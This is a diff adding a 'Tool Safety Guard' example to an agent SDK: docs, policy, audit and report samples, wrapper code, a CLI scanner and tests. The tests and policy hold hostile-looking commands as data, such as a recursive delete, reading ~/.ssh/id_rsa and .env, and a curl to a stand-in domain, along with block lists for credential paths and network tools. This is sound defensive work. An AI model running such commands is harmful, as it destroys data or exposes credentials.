diff --git a/examples/tool_safety/README.md b/examples/tool_safety/README.md
new file mode 100644
index 00000000..72ddc89d
--- /dev/null
+++ b/examples/tool_safety/README.md
@@ -0,0 +1,209 @@
+# Tool Safety Guard Example
+
+This example describes the design goals, usage, and deliverables of Tool Safety Guard. It runs deterministic safety checks at entry points such as tool calls, code execution, skill execution, and script scanning, and emits structured results, Telemetry attributes, and audit records.
+
+## Background and Design Goals
+
+Agent tools can typically perform file operations, run shell commands, make network requests, or install dependencies. These capabilities are useful, but they also carry risks such as accidental file deletion, secret leakage, access to unintended networks, infinite loops, and resource abuse.
+
+Tool Safety Guard aims to:
+
+- Give a deterministic verdict before a high-risk operation runs.
+- Let tool calls, CodeExecutor, Skill execution, and CLI scanning share one set of review logic.
+- Provide structured output and well-defined exit codes for CI and development workflows.
+- Record observability attributes and audit events for troubleshooting and compliance trails.
+- Stay lightweight: it does not replace a sandbox and does not introduce a new Telemetry framework.
+
+## Overall Architecture
+
+```text
+SafetyReviewer
+    ↓
+Rule
+    ↓
+Policy
+    ↓
+ToolSafetyFilter
+CodeExecutor Wrapper
+Skill Wrapper
+    ↓
+Telemetry
+Audit
+```
+
+- `SafetyReviewer` is the single entry point: it takes the text to check, the action type, and the tool name, and returns a structured review.
+- `Rule` provides deterministic pattern matching.
+- `Policy` provides the allowlist, blocked path, and risk level configuration.
+- `ToolSafetyFilter` plugs into an existing tool filter chain.
+- `CodeExecutor Wrapper` and `Skill Wrapper` cover execution entry points that have no Filter support.
+- Telemetry writes the safety verdict to the current OpenTelemetry span.
+- Audit stores offline audit records.
+
+## Rule Categories
+
+### File Operations
+
+File rules cover destructive deletes, reads of sensitive paths, and large file writes. Examples: deleting a directory, accessing `.env`, accessing an SSH private key path, or writing unusually large file content.
+
+### Network Access
+
+Network rules cover direct access to external domains, use of non-allowlisted domains, `wget`, raw sockets, the `aiohttp` client, and similar behavior. Domains that may be accessed should be configured explicitly through Policy.
+
+### System Commands
+
+System command rules cover high-risk patterns such as `os.system`, Python subprocess calls, shell pipes, command chaining, `sudo`, `systemctl`, and deployment or production keywords.
+
+### Dependency Installation
+
+Dependency installation rules cover commands that modify the environment, such as `pip install`, `npm install`, and `apt install`. The default result is usually `needs_human_review`, leaving a person to confirm whether execution may continue.
+
+### Resource Abuse
+
+Resource rules cover behavior that can exhaust resources, such as infinite loops, excessive concurrency, oversized file writes, and recursive process spawning.
+
+### Sensitive Information Leakage
+
+Sensitive information rules cover printing environment variables, tokens, passwords, secrets, API keys, and similar content, so that tool output does not carry credentials into the model context, logs, or the audit system.
+
+## Policy Configuration
+
+The example Policy is in [tool_safety_policy.yaml](./tool_safety_policy.yaml).
+
+Common fields:
+
+- `allowed_domains`: network domains that may be accessed. Domains are normalized, and subdomains can match.
+- `blocked_paths`: path fragments that must not be read or accessed, configured per rule ID.
+- `allowed_commands`: a command allowlist reserved for the caller or an upper-level executor.
+- `max_timeout`: a maximum timeout setting reserved for the caller or an upper-level executor.
+- `max_output_size`: a maximum output size setting reserved for the caller or an upper-level executor.
+- `risk_levels`: overrides the risk level per rule ID.
+
+Minimal example:
+
+```yaml
+allowed_domains:
+  - api.example.com
+
+blocked_paths:
+  read_dotenv:
+    - ".env"
+  read_ssh:
+    - "~/.ssh"
+
+risk_levels:
+  network_not_allowlisted: critical
+```
+
+## CLI Usage Examples
+
+The standalone scan command is `scripts/tool_safety_check.py`.
+
+Scan a Python script:
+
+```bash
+python scripts/tool_safety_check.py example.py
+```
+
+Scan a Bash script:
+
+```bash
+python scripts/tool_safety_check.py example.sh
+```
+
+Specify a Policy:
+
+```bash
+python scripts/tool_safety_check.py example.sh --policy examples/tool_safety/tool_safety_policy.yaml
+```
+
+Print the report in text format:
+
+```bash
+python scripts/tool_safety_check.py example.sh --format text
+```
+
+Write a JSON report file:
+
+```bash
+python scripts/tool_safety_check.py example.sh --output tool_safety_report.json
+```
+
+Exit code convention:
+
+| Decision | Exit Code | Meaning |
+| --- | ---: | --- |
+| `allow` | 0 | Execution may continue |
+| `deny` | 1 | Blocked; CI should fail |
+| `needs_human_review` | 2 | Human review required |
+
+## How to Add a Rule
+
+Keep each new Rule small and explicit:
+
+1. Define the risk scenario and the expected decision.
+2. Add a stable `rule_id`, `finding`, `recommendation`, and match pattern.
+3. Add the default risk level under `risk_levels` in the Policy.
+4. Add unit tests for allow, deny, or `needs_human_review`.
+5. Confirm that the CLI, Filter, and Wrapper all pick up the rule automatically through `SafetyReviewer`.
+
+A Rule should not take on execution isolation, and it should not read system state. It only reviews input text.
+
+## Tool Filter vs. Wrapper
+
+`ToolSafetyFilter` is for a `BaseTool` that is already wired into the framework's tool filter chain. It runs before the tool executes and returns a structured tool error when a blocking rule matches.
+
+A Wrapper is for entry points without Filter support, such as calling `CodeExecutor.execute_code()` directly or running a Skill runner directly. The Wrapper wraps the original entry point by composition and does not change the underlying executor.
+
+What the two have in common:
+
+- Both reuse `SafetyReviewer`.
+- Both reuse the same Rules and Policy.
+- Both emit the same style of safety decision.
+- Both write the same Telemetry attributes.
+
+## Telemetry
+
+After a safety check completes, the following attributes are written to the current OpenTelemetry span:
+
+- `tool.safety.decision`
+- `tool.safety.risk_level`
+- `tool.safety.rule_id`
+
+If OpenTelemetry is not enabled in the current environment, the write degrades to a no-op and does not affect tool execution or CLI scanning.
+
+## Audit
+
+The example audit file is [tool_safety_audit.jsonl](./tool_safety_audit.jsonl). Each line is one JSON record, which suits streaming writes and collection by log systems.
+
+Stable fields:
+
+- `tool_name`
+- `decision`
+- `risk_level`
+- `rule_id`
+- `blocked`
+- `latency`
+- `timestamp`
+- `input_sha256`
+
+The example report is [tool_safety_report.json](./tool_safety_report.json). It contains the three result types `allow`, `deny`, and `needs_human_review`, and can serve as a structured output example for a README or an Issue.
+
+## Known Limitations
+
+### False Positives
+
+Rules rely on deterministic pattern matching and may flag safe command fragments as high risk, for example dangerous commands shown in documentation, test strings, or escaped example code.
+
+### False Negatives
+
+Rules cannot cover all language semantics, dynamic string construction, encoding obfuscation, indirect calls, or commands generated at runtime. Sophisticated attacks may bypass static text matching.
+
+### Bypass Risk
+
+A model or user may try to bypass rules through variable concatenation, base64, download-then-execute, cross-file composition, and similar techniques. An overly broad Policy allowlist can also weaken protection.
+
+## Why Safety Guard Cannot Replace a Sandbox
+
+Safety Guard is a static review layer that runs before execution. It is suited to quickly blocking obvious risks and producing observable evidence. It cannot provide process isolation, filesystem isolation, network isolation, privilege isolation, or resource quotas.
+
+Production environments should still use a sandbox, containers, read-only mounts, network policies, least-privilege credentials, resource limits, and a human review process. Safety Guard should be one layer of defense in front of the sandbox, not a substitute for it.
diff --git a/examples/tool_safety/samples/allow.py b/examples/tool_safety/samples/allow.py
new file mode 100644
index 00000000..66f066fa
--- /dev/null
+++ b/examples/tool_safety/samples/allow.py
@@ -0,0 +1 @@
+print('hello from tool safety')
diff --git a/examples/tool_safety/samples/deny.sh b/examples/tool_safety/samples/deny.sh
new file mode 100644
index 00000000..365113e6
--- /dev/null
+++ b/examples/tool_safety/samples/deny.sh
@@ -0,0 +1,2 @@
+# Inert sample: rm -rf /tmp/demo
+printf '%s\n' 'destructive delete sample is intentionally not executed'
diff --git a/examples/tool_safety/samples/needs_human_review.sh b/examples/tool_safety/samples/needs_human_review.sh
new file mode 100644
index 00000000..d6cc63ab
--- /dev/null
+++ b/examples/tool_safety/samples/needs_human_review.sh
@@ -0,0 +1,2 @@
+# Inert sample: npm install left-pad
+printf '%s\n' 'dependency install sample is intentionally not executed'
diff --git a/examples/tool_safety/tool_safety_audit.jsonl b/examples/tool_safety/tool_safety_audit.jsonl
new file mode 100644
index 00000000..74cbd99a
--- /dev/null
+++ b/examples/tool_safety/tool_safety_audit.jsonl
@@ -0,0 +1,3 @@
+{"action_type": "python", "allowed_domains": [], "blocked": false, "case": "allow_python", "decision": "allow", "desensitized": false, "input_sha256": "7523adf6df9ff2c18a6116b069e77f4fe8d273a980a0a4610f904e4809ddffa3", "latency": 3.5e-05, "risk_level": "none", "rule_id": "safe_python", "rules_evaluated": ["safe_python", "network_allowlist", "network_not_allowlisted", "read_dotenv", "read_ssh", "dangerous_delete", "subprocess_execution", "os_system_execution", "package_install", "npm_install", "apt_install", "infinite_loop", "sensitive_output", "wget_network", "aiohttp_network", "socket_network", "fork_bomb", "bash_pipe", "shell_injection", "excessive_concurrency", "large_file_write", "human_review_required"], "timestamp": "2026-07-01T00:00:00Z", "tool_name": "tool_safety_check"}
+{"action_type": "bash", "allowed_domains": [], "blocked": true, "case": "deny_bash", "decision": "deny", "desensitized": false, "input_sha256": "6ac440d686cb1abc7d1be8778126fcd67d01fc279fa5ce75a90065778209adc1", "latency": 0.000153, "risk_level": "critical", "rule_id": "dangerous_delete", "rules_evaluated": ["safe_python", "network_allowlist", "network_not_allowlisted", "read_dotenv", "read_ssh", "dangerous_delete", "subprocess_execution", "os_system_execution", "package_install", "npm_install", "apt_install", "infinite_loop", "sensitive_output", "wget_network", "aiohttp_network", "socket_network", "fork_bomb", "bash_pipe", "shell_injection", "excessive_concurrency", "large_file_write", "human_review_required"], "timestamp": "2026-07-01T00:00:01Z", "tool_name": "tool_safety_check"}
+{"action_type": "bash", "allowed_domains": [], "blocked": true, "case": "needs_human_review_bash", "decision": "needs_human_review", "desensitized": false, "input_sha256": "e5e6076a68ab5cc084360b7b1d92875e83d64bbf48090db0eb7c3e6ea0e03b74", "latency": 2e-05, "risk_level": "medium", "rule_id": "npm_install", "rules_evaluated": ["safe_python", "network_allowlist", "network_not_allowlisted", "read_dotenv", "read_ssh", "dangerous_delete", "subprocess_execution", "os_system_execution", "package_install", "npm_install", "apt_install", "infinite_loop", "sensitive_output", "wget_network", "aiohttp_network", "socket_network", "fork_bomb", "bash_pipe", "shell_injection", "excessive_concurrency", "large_file_write", "human_review_required"], "timestamp": "2026-07-01T00:00:02Z", "tool_name": "tool_safety_check"}
diff --git a/examples/tool_safety/tool_safety_policy.yaml b/examples/tool_safety/tool_safety_policy.yaml
new file mode 100644
index 00000000..1a2487d5
--- /dev/null
+++ b/examples/tool_safety/tool_safety_policy.yaml
@@ -0,0 +1,43 @@
+allowed_domains:
+  - api.example.com
+
+blocked_paths:
+  read_dotenv:
+    - ".env"
+    - ".env.local"
+  read_ssh:
+    - "~/.ssh"
+    - ".ssh/"
+
+allowed_commands:
+  - bash
+  - echo
+  - python
+  - python3
+
+max_timeout: 60
+max_output_size: 10000
+
+risk_levels:
+  safe_python: none
+  dangerous_delete: critical
+  read_dotenv: high
+  read_ssh: critical
+  subprocess_execution: high
+  os_system_execution: high
+  package_install: medium
+  npm_install: medium
+  apt_install: medium
+  infinite_loop: high
+  sensitive_output: high
+  wget_network: high
+  aiohttp_network: high
+  socket_network: high
+  fork_bomb: critical
+  bash_pipe: medium
+  shell_injection: medium
+  excessive_concurrency: high
+  large_file_write: high
+  human_review_required: medium
+  network_allowlist: none
+  network_not_allowlisted: high
diff --git a/examples/tool_safety/tool_safety_report.json b/examples/tool_safety/tool_safety_report.json
new file mode 100644
index 00000000..53a0aa5c
--- /dev/null
+++ b/examples/tool_safety/tool_safety_report.json
@@ -0,0 +1,39 @@
+{
+  "generated_by": "SafetyReviewer + scripts/tool_safety_check.py report schema",
+  "reports": [
+    {
+      "action_type": "python",
+      "case": "allow_python",
+      "decision": "allow",
+      "evidence": "",
+      "finding": "No risky code or command patterns detected.",
+      "path": "examples/tool_safety/samples/allow.py",
+      "recommendation": "Proceed with normal execution.",
+      "risk_level": "none",
+      "rule_id": "safe_python"
+    },
+    {
+      "action_type": "bash",
+      "case": "deny_bash",
+      "decision": "deny",
+      "evidence": "rm -rf",
+      "finding": "Destructive delete operation detected.",
+      "path": "examples/tool_safety/samples/deny.sh",
+      "recommendation": "Do not run destructive deletes without explicit user approval and scoped paths.",
+      "risk_level": "critical",
+      "rule_id": "dangerous_delete"
+    },
+    {
+      "action_type": "bash",
+      "case": "needs_human_review_bash",
+      "decision": "needs_human_review",
+      "evidence": "npm install",
+      "finding": "NPM package installation command detected.",
+      "path": "examples/tool_safety/samples/needs_human_review.sh",
+      "recommendation": "Send npm dependency installation through human review before mutating the environment.",
+      "risk_level": "medium",
+      "rule_id": "npm_install"
+    }
+  ],
+  "schema_version": 1
+}
diff --git a/examples/tool_safety/wrappers.py b/examples/tool_safety/wrappers.py
new file mode 100644
index 00000000..94fcc80c
--- /dev/null
+++ b/examples/tool_safety/wrappers.py
@@ -0,0 +1,212 @@
+# Tencent is pleased to support the open source community by making tRPC-Agent-Python available.
+#
+# Copyright (C) 2026 Tencent. All rights reserved.
+#
+# tRPC-Agent-Python is licensed under Apache-2.0.
+"""Safety wrapper examples for execution paths that do not use filters.
+
+These wrappers intentionally live under ``examples``. They demonstrate how to
+reuse the same deterministic ``SafetyReviewer`` used by ``ToolSafetyFilter``
+without changing the core CodeExecutor or Skill implementations.
+"""
+
+from __future__ import annotations
+
+import inspect
+import json
+from typing import Any
+from typing import Awaitable
+from typing import Callable
+from typing import Mapping
+from typing import Protocol
+from typing import Sequence
+
+from pydantic import Field
+
+from trpc_agent_sdk._tool_safety_telemetry import trace_tool_safety_review
+from trpc_agent_sdk.code_executors import BaseCodeExecutor
+from trpc_agent_sdk.code_executors import CodeBlock
+from trpc_agent_sdk.code_executors import CodeExecutionInput
+from trpc_agent_sdk.code_executors import CodeExecutionResult
+from trpc_agent_sdk.context import InvocationContext
+from trpc_agent_sdk.tools.safety import SafetyReview
+from trpc_agent_sdk.tools.safety import SafetyReviewer
+from trpc_agent_sdk.types import Outcome
+
+_DEFAULT_BLOCK_DECISIONS = ("deny", "needs_human_review")
+
+
+class SkillRunner(Protocol):
+    """Minimal protocol for skill-like execution entries."""
+
+    async def run_async(self, *, tool_context: InvocationContext, args: dict[str, Any]) -> Any:
+        """Run the skill entry."""
+
+
+SkillCallable = Callable[[InvocationContext, dict[str, Any]], Awaitable[Any] | Any]
+
+
+class SafetyReviewedCodeExecutor(BaseCodeExecutor):
+    """Composition wrapper that reviews code before delegating execution."""
+
+    executor: BaseCodeExecutor = Field(exclude=True)
+    reviewer: SafetyReviewer = Field(default_factory=SafetyReviewer, exclude=True)
+    block_decisions: tuple[str, ...] = _DEFAULT_BLOCK_DECISIONS
+
+    def __init__(
+        self,
+        executor: BaseCodeExecutor,
+        *,
+        reviewer: SafetyReviewer | None = None,
+        block_decisions: Sequence[str] = _DEFAULT_BLOCK_DECISIONS,
+    ) -> None:
+        super().__init__(
+            executor=executor,
+            reviewer=reviewer or SafetyReviewer(),
+            block_decisions=tuple(block_decisions),
+            optimize_data_file=executor.optimize_data_file,
+            stateful=executor.stateful,
+            error_retry_attempts=executor.error_retry_attempts,
+            execute_once_per_invocation=executor.execute_once_per_invocation,
+            code_block_delimiters=list(executor.code_block_delimiters),
+            execution_result_delimiters=list(executor.execution_result_delimiters),
+            workspace_runtime=executor.workspace_runtime,
+            ignore_codes=list(executor.ignore_codes),
+        )
+
+    async def execute_code(
+        self,
+        invocation_context: InvocationContext,
+        code_execution_input: CodeExecutionInput,
+    ) -> CodeExecutionResult:
+        """Review the code input and execute only when allowed."""
+        review = self.reviewer.review(
+            _serialize_code_execution_input(code_execution_input),
+            action_type=_infer_code_action_type(code_execution_input),
+            tool_name="code_executor",
+        )
+        trace_tool_safety_review(review)
+        if review.decision not in self.block_decisions:
+            return await self.executor.execute_code(invocation_context, code_execution_input)
+        return _blocked_code_execution_result(review)
+
+
+class SafetyReviewedSkillRunner:
+    """Wrapper for direct skill execution entries that do not use filters."""
+
+    def __init__(
+        self,
+        runner: SkillRunner | SkillCallable,
+        *,
+        reviewer: SafetyReviewer | None = None,
+        block_decisions: Sequence[str] = _DEFAULT_BLOCK_DECISIONS,
+        tool_name: str = "skill_run",
+    ) -> None:
+        self._runner = runner
+        self._reviewer = reviewer or SafetyReviewer()
+        self._block_decisions = frozenset(block_decisions)
+        self._tool_name = tool_name
+
+    @property
+    def reviewer(self) -> SafetyReviewer:
+        """Return the reviewer used by this wrapper."""
+        return self._reviewer
+
+    async def run(self, tool_context: InvocationContext, args: dict[str, Any]) -> Any:
+        """Review skill arguments and execute only when allowed."""
+        review = self._reviewer.review(
+            _serialize_mapping(args),
+            action_type=_infer_skill_action_type(args),
+            tool_name=self._tool_name,
+        )
+        trace_tool_safety_review(review)
+        if review.decision in self._block_decisions:
+            return _blocked_skill_response(review)
+        return await _call_skill_runner(self._runner, tool_context, args)
+
+
+def _serialize_code_execution_input(code_execution_input: CodeExecutionInput) -> str:
+    parts: list[str] = []
+    for block in _code_blocks(code_execution_input):
+        if block.language:
+            parts.append(f"language: {block.language}")
+        parts.append(block.code)
+    if code_execution_input.input_files:
+        parts.append(_serialize_mapping({"input_files": code_execution_input.input_files}))
+    return "\n".join(part for part in parts if part)
+
+
+def _code_blocks(code_execution_input: CodeExecutionInput) -> list[CodeBlock]:
+    if code_execution_input.code_blocks:
+        return list(code_execution_input.code_blocks)
+    if code_execution_input.code:
+        return [CodeBlock(code=code_execution_input.code, language="python")]
+    return []
+
+
+def _infer_code_action_type(code_execution_input: CodeExecutionInput) -> str:
+    languages = {block.language.strip().lower() for block in _code_blocks(code_execution_input) if block.language}
+    if languages & {"bash", "sh", "shell", "zsh"}:
+        return "bash"
+    if languages & {"python", "py"}:
+        return "python"
+    return next(iter(languages), "code")
+
+
+def _infer_skill_action_type(args: Mapping[str, Any]) -> str:
+    command = args.get("command")
+    if isinstance(command, str):
+        return "bash"
+    return "skill"
+
+
+async def _call_skill_runner(
+    runner: SkillRunner | SkillCallable,
+    tool_context: InvocationContext,
+    args: dict[str, Any],
+) -> Any:
+    if hasattr(runner, "run_async"):
+        result = runner.run_async(tool_context=tool_context, args=args)  # type: ignore[attr-defined]
+    else:
+        result = runner(tool_context, args)  # type: ignore[operator]
+    if inspect.isawaitable(result):
+        return await result
+    return result
+
+
+def _serialize_mapping(value: Mapping[str, Any]) -> str:
+    return json.dumps(value, ensure_ascii=False, sort_keys=True, default=_json_default)
+
+
+def _json_default(value: Any) -> Any:
+    if hasattr(value, "model_dump"):
+        return value.model_dump(mode="json")
+    return str(value)
+
+
+def _blocked_code_execution_result(review: SafetyReview) -> CodeExecutionResult:
+    return CodeExecutionResult(
+        outcome=Outcome.OUTCOME_FAILED,
+        output=json.dumps(_blocked_response("CODE_EXECUTION", review), ensure_ascii=False, sort_keys=True),
+    )
+
+
+def _blocked_skill_response(review: SafetyReview) -> dict[str, Any]:
+    return _blocked_response("SKILL_EXECUTION", review)
+
+
+def _blocked_response(prefix: str, review: SafetyReview) -> dict[str, Any]:
+    response: dict[str, Any] = {
+        "success": False,
+        "error": f"{prefix}_BLOCKED: {review.finding}",
+        "safety": review.report,
+        "safety_audit": review.audit,
+    }
+    if review.decision == "needs_human_review":
+        response["human_review"] = {
+            "required": True,
+            "status": "pending",
+            "finding": review.finding,
+            "recommendation": review.report.get("recommendation", ""),
+        }
+    return response
diff --git a/scripts/tool_safety_check.py b/scripts/tool_safety_check.py
new file mode 100644
index 00000000..11aa966e
--- /dev/null
+++ b/scripts/tool_safety_check.py
@@ -0,0 +1,123 @@
+#!/usr/bin/env python3
+# Tencent is pleased to support the open source community by making tRPC-Agent-Python available.
+#
+# Copyright (C) 2026 Tencent. All rights reserved.
+#
+# tRPC-Agent-Python is licensed under Apache-2.0.
+"""Standalone Tool Safety scanner for scripts.
+
+Usage:
+    python scripts/tool_safety_check.py example.py
+    python scripts/tool_safety_check.py example.sh --policy tool_safety_policy.yaml
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from pathlib import Path
+from typing import Any
+
+_PROJECT_ROOT = Path(__file__).resolve().parents[1]
+if str(_PROJECT_ROOT) not in sys.path:
+    sys.path.insert(0, str(_PROJECT_ROOT))
+
+from trpc_agent_sdk._tool_safety import SafetyReview
+from trpc_agent_sdk._tool_safety import SafetyReviewer
+
+_EXIT_CODES = {
+    "allow": 0,
+    "deny": 1,
+    "needs_human_review": 2,
+}
+
+
+def main(argv: list[str] | None = None) -> int:
+    """Run the Tool Safety scanner CLI."""
+    parser = _build_parser()
+    args = parser.parse_args(argv)
+
+    target = Path(args.path)
+    try:
+        source = target.read_text(encoding="utf-8")
+    except OSError as exc:
+        parser.error(f"unable to read {target}: {exc}")
+
+    policy_path = Path(args.policy) if args.policy else None
+    if policy_path is not None and not policy_path.exists():
+        parser.error(f"policy file not found: {policy_path}")
+
+    reviewer = SafetyReviewer(policy_path=policy_path)
+    review = reviewer.review(
+        source,
+        action_type=_infer_action_type(target, source),
+        tool_name="tool_safety_check",
+    )
+    report = _build_report(review, target)
+
+    output_text = _format_report(report, args.format)
+    print(output_text)
+
+    if args.output:
+        _write_json_report(Path(args.output), report)
+
+    return _EXIT_CODES.get(review.decision, 1)
+
+
+def _build_parser() -> argparse.ArgumentParser:
+    parser = argparse.ArgumentParser(description="Scan a Python or Bash script with Tool Safety rules.")
+    parser.add_argument("path", help="Python or Bash script to scan")
+    parser.add_argument("--policy", help="YAML Tool Safety policy file")
+    parser.add_argument(
+        "--format",
+        choices=("json", "text"),
+        default="json",
+        help="stdout report format (default: json)",
+    )
+    parser.add_argument("--output", help="Write the JSON report to this file")
+    return parser
+
+
+def _infer_action_type(path: Path, source: str) -> str:
+    suffix = path.suffix.lower()
+    if suffix == ".py":
+        return "python"
+    if suffix in {".sh", ".bash", ".zsh"}:
+        return "bash"
+    first_line = source.splitlines()[0] if source.splitlines() else ""
+    if "python" in first_line:
+        return "python"
+    if any(shell in first_line for shell in ("bash", "sh", "zsh")):
+        return "bash"
+    return "python"
+
+
+def _build_report(review: SafetyReview, path: Path) -> dict[str, Any]:
+    return {
+        "path": str(path),
+        "decision": review.decision,
+        "risk_level": review.report.get("risk_level", ""),
+        "rule_id": review.rule_id,
+        "evidence": review.report.get("evidence", ""),
+        "recommendation": review.report.get("recommendation", ""),
+        "finding": review.finding,
+    }
+
+
+def _format_report(report: dict[str, Any], output_format: str) -> str:
+    if output_format == "json":
+        return json.dumps(report, ensure_ascii=False, indent=2, sort_keys=True)
+    return "\n".join(f"{key}: {value}" for key, value in report.items())
+
+
+def _write_json_report(path: Path, report: dict[str, Any]) -> None:
+    path.parent.mkdir(parents=True, exist_ok=True)
+    path.write_text(
+        json.dumps(report, ensure_ascii=False, indent=2, sort_keys=True) + "\n",
+        encoding="utf-8",
+    )
+
+
+if __name__ == "__main__":
+    sys.exit(main())
diff --git a/tests/server/openclaw/tools/test_safety_review.py b/tests/server/openclaw/tools/test_safety_review.py
new file mode 100644
index 00000000..8d371d40
--- /dev/null
+++ b/tests/server/openclaw/tools/test_safety_review.py
@@ -0,0 +1,226 @@
+"""Tests for structured OpenClaw safety review decisions."""
+
+from __future__ import annotations
+
+import hashlib
+
+from trpc_agent_sdk.server.openclaw import SafetyReviewer
+
+
+def _assert_review(
+    *,
+    source: str,
+    action_type: str,
+    decision: str,
+    rule_id: str,
+    finding: str,
+    risk_level: str,
+    tool_name: str = "test_tool",
+    allowed_domains: tuple[str, ...] = ("api.example.com", ),
+) -> None:
+    reviewer = SafetyReviewer(allowed_domains=allowed_domains)
+
+    review = reviewer.review(source, action_type=action_type, tool_name=tool_name)
+    blocked = decision in {"deny", "needs_human_review"}
+
+    assert review.decision == decision
+    assert review.rule_id == rule_id
+    assert finding in review.finding
+
+    assert review.report["decision"] == decision
+    assert review.report["rule_id"] == rule_id
+    assert review.report["finding"] == review.finding
+    assert review.report["risk_level"] == risk_level
+    assert review.report["tool_name"] == tool_name
+    assert review.report["blocked"] is blocked
+    assert isinstance(review.report["latency"], float)
+    assert review.report["latency"] >= 0.0
+    assert isinstance(review.report["desensitized"], bool)
+    assert review.report["recommendation"]
+    assert "evidence" in review.report
+
+    assert review.audit["decision"] == decision
+    assert review.audit["rule_id"] == rule_id
+    assert review.audit["risk_level"] == risk_level
+    assert review.audit["tool_name"] == tool_name
+    assert review.audit["blocked"] is blocked
+    assert isinstance(review.audit["latency"], float)
+    assert review.audit["latency"] >= 0.0
+    assert isinstance(review.audit["desensitized"], bool)
+    assert review.audit["action_type"] == action_type
+    assert review.audit["input_sha256"] == hashlib.sha256(source.encode("utf-8")).hexdigest()
+    assert review.audit["allowed_domains"] == sorted(allowed_domains)
+    assert rule_id in review.audit["rules_evaluated"]
+
+
+def test_safe_python_allows_and_reports_audit() -> None:
+    source = "result = sum([1, 2, 3])\nprint(result)"
+
+    _assert_review(
+        source=source,
+        action_type="python",
+        decision="allow",
+        rule_id="safe_python",
+        finding="No risky code",
+        risk_level="none",
+    )
+
+
+def test_dangerous_delete_blocks_with_rule_finding_report_and_audit() -> None:
+    source = "rm -rf /tmp/project"
+
+    _assert_review(
+        source=source,
+        action_type="bash",
+        decision="deny",
+        rule_id="dangerous_delete",
+        finding="Destructive delete",
+        risk_level="critical",
+    )
+
+
+def test_read_dotenv_blocks_with_rule_finding_report_and_audit() -> None:
+    source = "from pathlib import Path\nprint(Path('.env').read_text())"
+
+    _assert_review(
+        source=source,
+        action_type="python",
+        decision="deny",
+        rule_id="read_dotenv",
+        finding="environment secret file",
+        risk_level="high",
+    )
+
+
+def test_read_home_ssh_blocks_with_rule_finding_report_and_audit() -> None:
+    source = "cat ~/.ssh/id_rsa"
+
+    _assert_review(
+        source=source,
+        action_type="bash",
+        decision="deny",
+        rule_id="read_ssh",
+        finding="SSH credentials",
+        risk_level="critical",
+    )
+
+
+def test_allowlisted_network_request_allows_with_rule_finding_report_and_audit() -> None:
+    source = "import requests\nrequests.get('https://api.example.com/v1/status')"
+
+    _assert_review(
+        source=source,
+        action_type="python",
+        decision="allow",
+        rule_id="network_allowlist",
+        finding="allowlisted domain",
+        risk_level="none",
+    )
+
+
+def test_non_allowlisted_network_request_blocks_with_rule_finding_report_and_audit() -> None:
+    source = "curl https://evil.example/download"
+
+    _assert_review(
+        source=source,
+        action_type="bash",
+        decision="deny",
+        rule_id="network_not_allowlisted",
+        finding="non-allowlisted domain",
+        risk_level="high",
+    )
+
+
+def test_subprocess_blocks_with_rule_finding_report_and_audit() -> None:
+    source = "import subprocess\nsubprocess.run(['sh', '-c', 'echo hi'])"
+
+    _assert_review(
+        source=source,
+        action_type="python",
+        decision="deny",
+        rule_id="subprocess_execution",
+        finding="Subprocess execution",
+        risk_level="high",
+    )
+
+
+def test_pip_install_requires_review_with_rule_finding_report_and_audit() -> None:
+    source = "python -m pip install requests"
+
+    _assert_review(
+        source=source,
+        action_type="bash",
+        decision="needs_human_review",
+        rule_id="package_install",
+        finding="Package installation",
+        risk_level="medium",
+    )
+
+
+def test_infinite_loop_blocks_with_rule_finding_report_and_audit() -> None:
+    source = "while True:\n pass"
+
+    _assert_review(
+        source=source,
+        action_type="python",
+        decision="deny",
+        rule_id="infinite_loop",
+        finding="unbounded loop",
+        risk_level="high",
+    )
+
+
+def test_sensitive_information_output_blocks_with_rule_finding_report_and_audit() -> None:
+    source = "api_key = 'sk-live-secret'\nprint(api_key)"
+
+    reviewer = SafetyReviewer(allowed_domains=("api.example.com", ))
+    review = reviewer.review(source, action_type="python", tool_name="secret_tool")
+
+    assert review.decision == "deny"
+    assert review.rule_id == "sensitive_output"
+    assert "sensitive information output" in review.finding
+    assert review.report["decision"] == "deny"
+    assert review.report["rule_id"] == "sensitive_output"
+    assert review.report["finding"] == review.finding
+    assert review.report["risk_level"] == "high"
+    assert review.report["tool_name"] == "secret_tool"
+    assert review.report["blocked"] is True
+    assert isinstance(review.report["latency"], float)
+    assert isinstance(review.report["desensitized"], bool)
+    assert review.audit["decision"] == "deny"
+    assert review.audit["rule_id"] == "sensitive_output"
+    assert review.audit["risk_level"] == "high"
+    assert review.audit["tool_name"] == "secret_tool"
+    assert review.audit["blocked"] is True
+    assert isinstance(review.audit["latency"], float)
+    assert isinstance(review.audit["desensitized"], bool)
+    assert review.audit["action_type"] == "python"
+    assert review.audit["input_sha256"] == hashlib.sha256(source.encode("utf-8")).hexdigest()
+    assert "sk-live-secret" not in str(review.report)
+    assert "sk-live-secret" not in str(review.audit)
+
+
+def test_bash_pipe_requires_review_with_rule_finding_report_and_audit() -> None:
+    source = "printf 'hello' | wc -c"
+
+    _assert_review(
+        source=source,
+        action_type="bash",
+        decision="needs_human_review",
+        rule_id="bash_pipe",
+        finding="Bash pipeline",
+        risk_level="medium",
+    )
+
+
+def test_human_review_scenario_requires_review_with_rule_finding_report_and_audit() -> None:
+    source = "sudo systemctl restart production-api"
+
+    _assert_review(
+        source=source,
+        action_type="bash",
+        decision="needs_human_review",
+        rule_id="human_review_required",
+        finding="requires human review",
+        risk_level="medium",
+    )
diff --git a/tests/tools/safety/test_cli.py b/tests/tools/safety/test_cli.py
new file mode 100644
index 00000000..834b9acd
--- /dev/null
+++ b/tests/tools/safety/test_cli.py
@@ -0,0 +1,130 @@
+"""Tests for the standalone Tool Safety scanner CLI."""
+
+from __future__ import annotations
+
+import importlib.util
+import json
+import time
+from pathlib import Path
+
+import pytest
+
+
+def _load_cli_module():
+    script_path = Path(__file__).resolve().parents[3] / "scripts" / "tool_safety_check.py"
+    spec = importlib.util.spec_from_file_location("tool_safety_check", script_path)
+    module = importlib.util.module_from_spec(spec)
+    assert spec.loader is not None
+    spec.loader.exec_module(module)
+    return module
+
+
+def test_cli_allows_safe_python_script(tmp_path, capsys) -> None:
+    cli = _load_cli_module()
+    script = tmp_path / "safe.py"
+    script.write_text("print('hello')\n", encoding="utf-8")
+
+    exit_code = cli.main([str(script)])
+
+    output = json.loads(capsys.readouterr().out)
+    assert exit_code == 0
+    assert output["decision"] == "allow"
+    assert output["risk_level"] == "none"
+    assert output["rule_id"] == "safe_python"
+
+
+def test_cli_allows_safe_bash_script_text_format(tmp_path, capsys) -> None:
+    cli = _load_cli_module()
